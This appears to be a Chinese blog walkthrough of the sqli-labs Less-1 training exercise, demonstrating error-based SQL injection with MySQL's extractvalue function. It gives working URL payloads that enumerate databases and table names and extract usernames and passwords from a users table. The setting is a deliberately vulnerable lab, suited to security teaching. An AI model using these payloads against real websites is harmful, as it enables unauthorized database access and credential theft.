天天看點
傳回

sqli-labs less-1(報錯注入之extractvalue)

目錄

​​ less-1(報錯注入之extractvalue)​​

​​1.原理​​

​​2.爆破所有庫​​

​​3爆破security的所有表名​​

​​4.查詢users的第三行資料​​

 less-1(報錯注入之extractvalue)

1.原理

sqli-labs less-1(報錯注入之extractvalue)

2.爆破所有庫

所有資料庫名

sqli-labs less-1(報錯注入之extractvalue)

?id=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))-- -

?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),1,31) from information_schema.schemata)))-- - #字母限制僅能顯示31個

sqli-labs less-1(報錯注入之extractvalue)

?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),32,31) from information_schema.schemata)))-- -

sqli-labs less-1(報錯注入之extractvalue)

?id=1' and extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),63,31) from information_schema.schemata)))-- - 

sqli-labs less-1(報錯注入之extractvalue)

3爆破security的所有表名

Security的所有表名

sqli-labs less-1(報錯注入之extractvalue)

?id=1’ and extractvalue(1,concat(0x7e,( select group_concat(table_name) from information_schema.tables where table_schema=’security’),0x7e))-- -

sqli-labs less-1(報錯注入之extractvalue)

4.查詢users的第三行資料

sqli-labs less-1(報錯注入之extractvalue)

?id=1’ and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users where id=3),0x7e))-- -

sqli-labs less-1(報錯注入之extractvalue)
表名 資料 資料庫
上一篇: 【野蠻生長】個人發展之冰山模型一、假設二、解決方案三、其他推薦
下一篇: sqli-labs less-1(報錯注入之updatexml)

繼續閱讀